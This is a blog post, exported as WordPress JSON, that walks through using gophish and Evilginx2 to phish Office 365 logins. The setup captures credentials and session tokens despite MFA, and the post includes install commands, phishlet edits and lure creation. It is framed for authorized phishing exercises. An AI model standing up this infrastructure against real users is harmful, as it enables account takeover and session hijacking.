{"id":883,"date":"2022-06-02T06:06:31","date_gmt":"2022-06-02T06:06:31","guid":{"rendered":"https:\/\/zineausa.com\/blog\/?p=883"},"modified":"2024-10-11T02:02:49","modified_gmt":"2024-10-11T02:02:49","slug":"phishing-o365-with-mfa-using-gophish-and-evilginx2","status":"publish","type":"post","link":"https:\/\/zineausa.com\/blog\/2022\/06\/phishing-o365-with-mfa-using-gophish-and-evilginx2\/","title":{"rendered":"Phishing O365 with MFA using gophish and Evilginx2"},"content":{"rendered":"\n<p>This guide is to help with the setup of <a href=\"https:\/\/getgophish.com\/\">gophish<\/a> to track clicks, and <a href=\"https:\/\/github.com\/kgretzky\/evilginx2\">Evilginx2<\/a> to capture tokens and creds for O365 logins. This will work even if MFA is enabled on the target accounts.<\/p>\n\n\n\n<p><strong>Update as of 10\/10\/24:<\/strong> There is now an official integration that you should probably follow; however, the Evilginx setup part of this guide should still be relevant. <a href=\"https:\/\/breakdev.org\/evilginx-3-3-go-phish\">https:\/\/breakdev.org\/evilginx-3-3-go-phish<\/a><\/p>\n\n\n\n<p><strong>DISCLAIMER: This is for research purposes only, or for security folks with written approval to do phishing exercises. Please do not use this for evil.<\/strong><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Step 1: Setup gophish<\/h2>\n\n\n\n<p>We are using AWS because it&#8217;s not a good idea to try to use Azure to phish O365 creds &#8211; go figure. We are standing up a default Ubuntu EC2 instance; its OS is 22.04 for those that are wondering. 
You&#8217;ll also want to register a domain you want to use for this.<\/p>\n\n\n\n<p>Grab the installer off their site, install screen and unzip, unzip the archive, and run the server (we are using screen so we can manage it later):<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>wget https:\/\/github.com\/gophish\/gophish\/releases\/download\/v0.11.0\/gophish-v0.11.0-linux-64bit.zip\napt install unzip screen\nunzip gophish-v0.11.0-linux-64bit.zip\nscreen\nchmod +x gophish\n.\/gophish<\/code><\/pre>\n\n\n\n<p>Now open ports 3333, 80, and 443 in your security groups, because you&#8217;re going to want admin access and general web access. You can limit 3333 to your home public IP only if you like.<\/p>\n\n\n\n<p>You have to change the config file to have the listen URL be 0.0.0.0 for admin if you want remote admin access, which we do. Now go ahead and restart gophish with <code>.\/gophish<\/code>.<\/p>\n\n\n\n<p>Point your DNS at your server for www and @.<\/p>\n\n\n\n<p>Next we have to get the cert &#8211; so we install <a href=\"https:\/\/certbot.eff.org\/instructions?ws=other&amp;os=ubuntufocal\">certbot<\/a> with the following (first turn off gophish again temporarily):<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo -s\napt install snapd\nsudo snap install core; sudo snap refresh core\nsudo snap install --classic certbot\nsudo ln -s \/snap\/bin\/certbot \/usr\/bin\/certbot\nsudo certbot certonly --standalone\n#follow the prompts on the screen for your domain\ncp \/etc\/letsencrypt\/live\/oncallcm.com\/fullchain.pem .\ncp \/etc\/letsencrypt\/live\/oncallcm.com\/privkey.pem .\nvi config.json #(and replace the phish server and admin_server certs with those new ones - fullchain.pem is your cert, and privkey.pem is your key. 
Also replace 80 with 443).\n#now once those edits are done run gophish again with:\n.\/gophish<\/code><\/pre>\n\n\n\n<p>Your config file should look like this once you&#8217;re done with it: <\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"428\" height=\"298\" src=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2022\/06\/image-2.png\" alt=\"\" class=\"wp-image-894\" srcset=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2022\/06\/image-2.png 428w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2022\/06\/image-2-300x209.png 300w\" sizes=\"auto, (max-width: 428px) 100vw, 428px\" \/><\/figure>\n\n\n\n<p>Next, set up your landing profiles, user profiles, and <a href=\"https:\/\/zineausa.com\/blog\/2022\/04\/setting-up-gophish-o365-sending-profile-2022\/\">sending profile<\/a> as you usually do with gophish. I have a <a href=\"https:\/\/zineausa.com\/blog\/2022\/04\/setting-up-gophish-o365-sending-profile-2022\/\">guide<\/a> on how to use O365 as a sending profile, but I recommend you use Google Workspace instead &#8211; it&#8217;s much easier. O365 will limit your outbound emails to about 25 per hour, FYI.<\/p>\n\n\n\n<p>Some tips: in email templates, use &#8220;{{.FirstName}}&#8221; and &#8220;{{.URL}}&#8221; to template in the recipient&#8217;s first name and the landing URL.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Step 2: Setup Evilginx2<\/h2>\n\n\n\n<p>Okay &#8211; so now we need to direct the landing page to go to Evilginx2 for MFA bypass\/session token capture. 
If you just want email\/pw you can stop at step 1.<\/p>\n\n\n\n<p>We are standing up another Ubuntu 22.04 server and another domain, because Evilginx2 stands up its own DNS server for cert stuff.<\/p>\n\n\n\n<p>Now follow the instructions below to get evilginx started:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo apt-get -y install git make screen golang\ngit clone https:\/\/github.com\/kgretzky\/evilginx2.git\ncd evilginx2\nmake\nscreen\nsudo .\/build\/evilginx -p .\/phishlets -t .\/redirectors -developer\n#the next two commands are typed at the evilginx prompt\nconfig domain &lt;domain&gt;\nconfig ip &lt;ip address&gt;\n#Now exit and edit the following file adding a DNS and switching DNSStubListener to no, see below for an example\n#(DNSStubListener is a systemd-resolved option, so the file to edit is \/etc\/systemd\/resolved.conf)\nsudo vi \/etc\/systemd\/resolved.conf\nsudo ln -sf \/run\/systemd\/resolve\/resolv.conf \/etc\/resolv.conf\nsudo reboot #reboots your server\ncd evilginx2\nsudo .\/build\/evilginx -p .\/phishlets -t .\/redirectors -developer<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"827\" height=\"288\" src=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2022\/06\/image-3.png\" alt=\"\" class=\"wp-image-898\" srcset=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2022\/06\/image-3.png 827w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2022\/06\/image-3-300x104.png 300w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2022\/06\/image-3-768x267.png 768w\" sizes=\"auto, (max-width: 827px) 100vw, 827px\" \/><figcaption class=\"wp-element-caption\">resolv.conf<\/figcaption><\/figure>\n\n\n\n<p>Now, point your domain&#8217;s DNS at the server, and don&#8217;t forget to open ports 80, 443, and 53 on this server, in addition to 22 if you need it, at the security group level. 
If you&#8217;re using GoDaddy you may need another domain to resolve ns1.&lt;domain&gt;.com and ns2.&lt;domain&gt;.com to your nameserver and point the domain to the ns1 and ns2.<\/p>\n\n\n\n<p>Next we have to fix the phishlet: open o365.yaml in the phishlets folder and add the following lines:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>auth_urls:\n  - '\/kmsi*'<\/code><\/pre>\n\n\n\n<p>Should look like this when done:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"847\" height=\"645\" src=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2022\/06\/image-4.png\" alt=\"\" class=\"wp-image-900\" srcset=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2022\/06\/image-4.png 847w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2022\/06\/image-4-300x228.png 300w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2022\/06\/image-4-768x585.png 768w\" sizes=\"auto, (max-width: 847px) 100vw, 847px\" \/><figcaption class=\"wp-element-caption\">o365.yaml<\/figcaption><\/figure>\n\n\n\n<p>Now host the server again in screen and generate your phishlets and lures:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo .\/build\/evilginx -p .\/phishlets\/\nphishlets hostname o365 &lt;subdomain.DOMAIN&gt;\nphishlets enable o365\n\nlures create o365\nlures edit 0 redirect_url https:\/\/www.google.com\nlures get-url 0\n<\/code><\/pre>\n\n\n\n<p>Beautiful. Now copy that URL into gophish as a button or whatever and you should be done. Use <code>sessions [number]<\/code> to see the results once you&#8217;ve captured creds. 
<\/p>\n\n\n\n<p>If you need help getting evidence for your client that you can use the tokens to login, check out my guide <a href=\"https:\/\/zineausa.com\/blog\/2022\/05\/how-to-automatically-replace-cookies-in-burpsuite\/\">here<\/a> for that.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>This guide is to help with the setup of gophish to track clicks, and Evilginx2 to capture tokens and creds for O365 logins. This will work even if MFA is enabled on the target accounts. Update as of 10\/10\/24: There is an official integration now here that you should probably follow, however, the Evilginx setup [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":904,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-883","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Phishing O365 with MFA using gophish and Evilginx2 - Zinea InfoSec Blog<\/title>\n<meta name=\"description\" content=\"A techincal guide on how to implement a phishing architecture using gophish and Evilginx2 for security assessments.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zineausa.com\/blog\/2022\/06\/phishing-o365-with-mfa-using-gophish-and-evilginx2\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Phishing O365 with MFA using gophish and Evilginx2 - Zinea InfoSec Blog\" \/>\n<meta property=\"og:description\" content=\"A techincal guide on how to implement a phishing architecture using gophish and Evilginx2 for security assessments.\" \/>\n<meta 
property=\"og:url\" content=\"https:\/\/zineausa.com\/blog\/2022\/06\/phishing-o365-with-mfa-using-gophish-and-evilginx2\/\" \/>\n<meta property=\"og:site_name\" content=\"Zinea InfoSec Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/zineausa\/\" \/>\n<meta property=\"article:published_time\" content=\"2022-06-02T06:06:31+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-10-11T02:02:49+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2022\/06\/evilginx_blog_title2.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1280\" \/>\n\t<meta property=\"og:image:height\" content=\"720\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Zinea\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@ZineaLLC\" \/>\n<meta name=\"twitter:site\" content=\"@ZineaLLC\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Zinea\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. 
reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2022\\\/06\\\/phishing-o365-with-mfa-using-gophish-and-evilginx2\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2022\\\/06\\\/phishing-o365-with-mfa-using-gophish-and-evilginx2\\\/\"},\"author\":{\"name\":\"Zinea\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#\\\/schema\\\/person\\\/e3c58d4f0650f7fb571c01fcf836b1d0\"},\"headline\":\"Phishing O365 with MFA using gophish and Evilginx2\",\"datePublished\":\"2022-06-02T06:06:31+00:00\",\"dateModified\":\"2024-10-11T02:02:49+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2022\\\/06\\\/phishing-o365-with-mfa-using-gophish-and-evilginx2\\\/\"},\"wordCount\":588,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2022\\\/06\\\/phishing-o365-with-mfa-using-gophish-and-evilginx2\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/06\\\/evilginx_blog_title2.jpg\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zineausa.com\\\/blog\\\/2022\\\/06\\\/phishing-o365-with-mfa-using-gophish-and-evilginx2\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2022\\\/06\\\/phishing-o365-with-mfa-using-gophish-and-evilginx2\\\/\",\"url\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2022\\\/06\\\/phishing-o365-with-mfa-using-gophish-and-evilginx2\\\/\",\"name\":\"Phishing O365 with MFA using gophish and Evilginx2 - Zinea InfoSec 
Blog\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2022\\\/06\\\/phishing-o365-with-mfa-using-gophish-and-evilginx2\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2022\\\/06\\\/phishing-o365-with-mfa-using-gophish-and-evilginx2\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/06\\\/evilginx_blog_title2.jpg\",\"datePublished\":\"2022-06-02T06:06:31+00:00\",\"dateModified\":\"2024-10-11T02:02:49+00:00\",\"description\":\"A techincal guide on how to implement a phishing architecture using gophish and Evilginx2 for security assessments.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2022\\\/06\\\/phishing-o365-with-mfa-using-gophish-and-evilginx2\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zineausa.com\\\/blog\\\/2022\\\/06\\\/phishing-o365-with-mfa-using-gophish-and-evilginx2\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2022\\\/06\\\/phishing-o365-with-mfa-using-gophish-and-evilginx2\\\/#primaryimage\",\"url\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/06\\\/evilginx_blog_title2.jpg\",\"contentUrl\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/06\\\/evilginx_blog_title2.jpg\",\"width\":1280,\"height\":720},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2022\\\/06\\\/phishing-o365-with-mfa-using-gophish-and-evilginx2\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Phishing O365 with MFA using gophish and 
Evilginx2\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/\",\"name\":\"Zinea InfoSec Blog\",\"description\":\"Cyber Security Resources\",\"publisher\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#organization\",\"name\":\"Zinea LLC\",\"url\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/05\\\/zinea-square.png\",\"contentUrl\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/05\\\/zinea-square.png\",\"width\":876,\"height\":876,\"caption\":\"Zinea 
LLC\"},\"image\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/zineausa\\\/\",\"https:\\\/\\\/x.com\\\/ZineaLLC\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#\\\/schema\\\/person\\\/e3c58d4f0650f7fb571c01fcf836b1d0\",\"name\":\"Zinea\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/81f66095634a4c974693824dc72cd0db7c7c44910d60dda2d1bf1be275ee107d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/81f66095634a4c974693824dc72cd0db7c7c44910d60dda2d1bf1be275ee107d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/81f66095634a4c974693824dc72cd0db7c7c44910d60dda2d1bf1be275ee107d?s=96&d=mm&r=g\",\"caption\":\"Zinea\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Phishing O365 with MFA using gophish and Evilginx2 - Zinea InfoSec Blog","description":"A techincal guide on how to implement a phishing architecture using gophish and Evilginx2 for security assessments.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zineausa.com\/blog\/2022\/06\/phishing-o365-with-mfa-using-gophish-and-evilginx2\/","og_locale":"en_US","og_type":"article","og_title":"Phishing O365 with MFA using gophish and Evilginx2 - Zinea InfoSec Blog","og_description":"A techincal guide on how to implement a phishing architecture using gophish and Evilginx2 for security assessments.","og_url":"https:\/\/zineausa.com\/blog\/2022\/06\/phishing-o365-with-mfa-using-gophish-and-evilginx2\/","og_site_name":"Zinea InfoSec 
Blog","article_publisher":"https:\/\/www.facebook.com\/zineausa\/","article_published_time":"2022-06-02T06:06:31+00:00","article_modified_time":"2024-10-11T02:02:49+00:00","og_image":[{"width":1280,"height":720,"url":"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2022\/06\/evilginx_blog_title2.jpg","type":"image\/jpeg"}],"author":"Zinea","twitter_card":"summary_large_image","twitter_creator":"@ZineaLLC","twitter_site":"@ZineaLLC","twitter_misc":{"Written by":"Zinea","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zineausa.com\/blog\/2022\/06\/phishing-o365-with-mfa-using-gophish-and-evilginx2\/#article","isPartOf":{"@id":"https:\/\/zineausa.com\/blog\/2022\/06\/phishing-o365-with-mfa-using-gophish-and-evilginx2\/"},"author":{"name":"Zinea","@id":"https:\/\/zineausa.com\/blog\/#\/schema\/person\/e3c58d4f0650f7fb571c01fcf836b1d0"},"headline":"Phishing O365 with MFA using gophish and Evilginx2","datePublished":"2022-06-02T06:06:31+00:00","dateModified":"2024-10-11T02:02:49+00:00","mainEntityOfPage":{"@id":"https:\/\/zineausa.com\/blog\/2022\/06\/phishing-o365-with-mfa-using-gophish-and-evilginx2\/"},"wordCount":588,"commentCount":0,"publisher":{"@id":"https:\/\/zineausa.com\/blog\/#organization"},"image":{"@id":"https:\/\/zineausa.com\/blog\/2022\/06\/phishing-o365-with-mfa-using-gophish-and-evilginx2\/#primaryimage"},"thumbnailUrl":"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2022\/06\/evilginx_blog_title2.jpg","inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zineausa.com\/blog\/2022\/06\/phishing-o365-with-mfa-using-gophish-and-evilginx2\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zineausa.com\/blog\/2022\/06\/phishing-o365-with-mfa-using-gophish-and-evilginx2\/","url":"https:\/\/zineausa.com\/blog\/2022\/06\/phishing-o365-with-mfa-using-gophish-and-evilginx2\/","name":"Phishing O365 with MFA using gophish and Evilginx2 
- Zinea InfoSec Blog","isPartOf":{"@id":"https:\/\/zineausa.com\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/zineausa.com\/blog\/2022\/06\/phishing-o365-with-mfa-using-gophish-and-evilginx2\/#primaryimage"},"image":{"@id":"https:\/\/zineausa.com\/blog\/2022\/06\/phishing-o365-with-mfa-using-gophish-and-evilginx2\/#primaryimage"},"thumbnailUrl":"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2022\/06\/evilginx_blog_title2.jpg","datePublished":"2022-06-02T06:06:31+00:00","dateModified":"2024-10-11T02:02:49+00:00","description":"A techincal guide on how to implement a phishing architecture using gophish and Evilginx2 for security assessments.","breadcrumb":{"@id":"https:\/\/zineausa.com\/blog\/2022\/06\/phishing-o365-with-mfa-using-gophish-and-evilginx2\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zineausa.com\/blog\/2022\/06\/phishing-o365-with-mfa-using-gophish-and-evilginx2\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zineausa.com\/blog\/2022\/06\/phishing-o365-with-mfa-using-gophish-and-evilginx2\/#primaryimage","url":"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2022\/06\/evilginx_blog_title2.jpg","contentUrl":"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2022\/06\/evilginx_blog_title2.jpg","width":1280,"height":720},{"@type":"BreadcrumbList","@id":"https:\/\/zineausa.com\/blog\/2022\/06\/phishing-o365-with-mfa-using-gophish-and-evilginx2\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zineausa.com\/blog\/"},{"@type":"ListItem","position":2,"name":"Phishing O365 with MFA using gophish and Evilginx2"}]},{"@type":"WebSite","@id":"https:\/\/zineausa.com\/blog\/#website","url":"https:\/\/zineausa.com\/blog\/","name":"Zinea InfoSec Blog","description":"Cyber Security 
Resources","publisher":{"@id":"https:\/\/zineausa.com\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zineausa.com\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zineausa.com\/blog\/#organization","name":"Zinea LLC","url":"https:\/\/zineausa.com\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zineausa.com\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/05\/zinea-square.png","contentUrl":"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/05\/zinea-square.png","width":876,"height":876,"caption":"Zinea LLC"},"image":{"@id":"https:\/\/zineausa.com\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/zineausa\/","https:\/\/x.com\/ZineaLLC"]},{"@type":"Person","@id":"https:\/\/zineausa.com\/blog\/#\/schema\/person\/e3c58d4f0650f7fb571c01fcf836b1d0","name":"Zinea","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/81f66095634a4c974693824dc72cd0db7c7c44910d60dda2d1bf1be275ee107d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/81f66095634a4c974693824dc72cd0db7c7c44910d60dda2d1bf1be275ee107d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/81f66095634a4c974693824dc72cd0db7c7c44910d60dda2d1bf1be275ee107d?s=96&d=mm&r=g","caption":"Zinea"}}]}},"_links":{"self":[{"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/posts\/883","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zineausa.com
\/blog\/wp-json\/wp\/v2\/comments?post=883"}],"version-history":[{"count":5,"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/posts\/883\/revisions"}],"predecessor-version":[{"id":991,"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/posts\/883\/revisions\/991"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/media\/904"}],"wp:attachment":[{"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/media?parent=883"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/categories?post=883"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/tags?post=883"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}